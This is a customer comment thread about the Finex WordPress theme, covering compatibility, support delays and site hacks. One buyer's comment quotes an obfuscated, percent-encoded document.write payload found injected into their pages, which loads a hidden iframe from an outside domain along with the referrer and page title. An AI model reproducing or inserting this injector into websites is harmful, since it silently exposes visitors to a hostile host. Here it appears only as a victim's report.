Discussion on Finex - Responsive Multi-Purpose Wordpress Theme

434 comments found

Very helpful staff. Five star support. :)

Hi, what are the plans to make this compatible with WP 4.0?

pego

Hi,

sorry, but for now no plans. We have a lot of support stuff, so didnt have time to cehck all themes for latest versions and then new ones come out as well.

Best regards,

pego

ttse7en Purchased

Hi I purchased this theme and installed an there seems to be some malware:

The following code is being added to my pages document.write(unescape(‘%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%28%66%75%6E%63%74%69%6F%6E%28%29%7B%76%61%72%20%64%3D%64%6F%63%75%6D%65%6E%74%3B%76%61%72%20%77%3D%31%3B%76%61%72%20%68%3D%31%3B%76%61%72%20%74%3D%64%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%76%61%72%20%69%64%20%3D%20%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%39%39%39%39%29%3B%76%61%72%20%73%72%63%20%3D%20%27%68%74%74%70%3A%2F%2F%6D%70%69%66%2E%65%75%2F%31%62%32%4B%27%3B%73%72%63%20%3D%20%73%72%63%20%2B%20%27%3F%73%65%5F%72%65%66%65%72%72%65%72%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%72%65%72%3B%73%72%63%20%3D%20%73%72%63%20%2B%20%27%26%64%65%66%61%75%6C%74%5F%6B%65%79%77%6F%72%64%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%74%69%74%6C%65%3B%73%72%63%20%3D%20%73%72%63%20%2B%20%27%26%72%3D%27%2B%69%64%3B%64%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%22%70%61%64%64%69%6E%67%3A%30%70%78%3B%62%6F%72%64%65%72%3A%6E%6F%6E%65%22%20%73%72%63%3D%22%27%20%2B%20%73%72%63%20%2B%20%27%22%20%77%69%64%74%68%3D%22%27%2B%77%2B%27%22%20%68%65%69%67%68%74%3D%22%27%2B%68%2B%27%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%7D%29%28%29%3B%3C%2F%73%63%72%69%70%74%3E’));

Any ideas

pego

Hi,

this shouldn’t be executed by the theme files. Do you use some plugin that could cause this?

regards

I notice above you mention that you are not going to update the theme. Is that correct? It looks like you mention that you have other themes coming out and this is why you are not updating this one.

If this is true I will not be buying any more themes from you if this is how support your products.

I hope I am wrong in this.

pego

Hi,

we update all themes so that main functionalities work. We do have a lot os support work so we didn’t check all the theme for latest Wordpress version, but are working all ok, with the compatible versions.

Best regards,

pego

My permalinks are not working with PORTFOLIO. It works for the default language English (e.g. http://www.remasalud.com/portfolio/stress-test/) but in Spanish and German it gives a 404 error. Thanks in advance for your help.

pego

Hi,

please contact us over mail designpego@gmail.com with some admin login.

Best regards

hugohhv Purchased

Is there an update coming anytime soon?

Default-user
hugohhv Purchased

Google Webmaster tools detect serious mobile usability problems. It is not mobile friendly according to google.

pego

Hi,

we will look into and send update.

Best regards

Hi,

How I can add a custom PHP script (calculator) to homepage created by Page Builder? Create custom field in Page Builder, create widget, shortcode…? How I can insert this script to homepage between other text?

I am writing to you in my client name. Thanks.

pego

Hi,

an option is to create a shortcode and then insert it into the column shortcode.

Best regards,

pego

Default-user

Hi,

Is there other method to insert my calculator to homepage? Create shortcode from my calculator is very hard, because there are lot of variables.

Thanks

pego

Hi,

it can also be done by putting the code directly into the theme files. And position it where you want it. You can send us an email with more details and we can help you with this.

Best regards,

pego

vyruz85 Purchased

Hi !

Can you please take a look at the issue I have reported at your support forum on March 26? Ticket #: 390850

I still didn’t receive any answer regarding that.

pego

Hi,

we repliek to your ticket, do reply there if needed.

Best regards,

pego

This theme is unsafe, I have the latest update supplied and yet I have still had code injected into my website and the site hacked as a result. You are clearly not checking on the plugins you use on this theme and making sure those are up to date! Why is there no recent update and why have other reports of the same issue not been dealt with by updating the theme and plugins?

pego

Hi,

which plugin that is used on the theme did you have in mind? We have a lot of support work and are doing updates as soon as we can.

Best regards,

pego

Default-user

As soon as you can? The last update was Sept 2014. This just isnt good enough if sites are getting hacked and compromised because you arent doing regular updates. This is the second time the same site has got hacked. The plugins at fault seem to be TinyMCE and the Revslider plugin

pego

Hi,

we send the plugin update to themes and don’t increase the theme version. You may send us an email and add access to your site so that we can check your plugin versions.

Best regards,

pego

hi,

i have used the remarky theme before and when i used that i had to remove the twitter auth from the functions.php.

It looks like i will have to do the same with this theme, will removing the following code just like i had to with remarky effect the theme?

include(“functions/twitteroauth.php”); include(“functions/widget-twitter.php”);

thanks

pego

Hi,

yes remove just those lines and make sure you are not using a twitter shortcode anywhere.

Best regards,

pego

Default-user

Hi,

Thanks, if i upload the dummy xml file will that use the twitter shortcode in it?

thanks

pego

Hi again,

if its used on some page, then it will. You will need to remove it from that page then. It wont give it to widgets.

Best regards,

pego

eldebate Purchased

For i just read this theme is not compability with the lates wordpress version.

I bought this theme 2 years ago, my site was hacking past days the reason was the lastes version of the revolution slyder.

Now i trying to install again with the new version of the plugin, but the import media files failed and i can´t charge a default home.

The reason is because the theme is updated and not compability with the wordpress 4.1¡?

Default-user
eldebate Purchased

The reason is because the theme is not update and incompability with the wordpress 4.1¡?

pego
pego Author

Hi,

we have checked the latest themes with the latest wordpress version, but haven’t done that for all of them. Each compatible Wordpress version is listed in the description page. When we release update we change if a latest support has been given.

regards

Hi, I am also having a problem where the mobile version of the site is pushed to the right, when the slider is disabled for mobile. I checked and I have the latest theme version. Please see www.kjmusic.com.au on mobile. Could you please assist with this issue? Thanks, Leah

pego
pego Author

Hi,

do open a support ticket or send us an email so with a temp admin access so that we can check this for you.

Best regards,

pego

Is it possible to have a filter on portfolio for categories and subcategories ?

pego
pego Author

Hi,

in order to separately include subcategories and second level filter, code changes are required. All categories are now taken into filter.

Best regards,

pego

awsjulio Purchased

Hi, any idea if this theme is 4.2.2 compatible before I update it? Item Detail – Software Version says up to 3.9 Thanks in advanced.

pego
pego Author

Hi,

the latest supported Wordpress version is 3.9

Best regards,

pego

by
by
by
by
by
by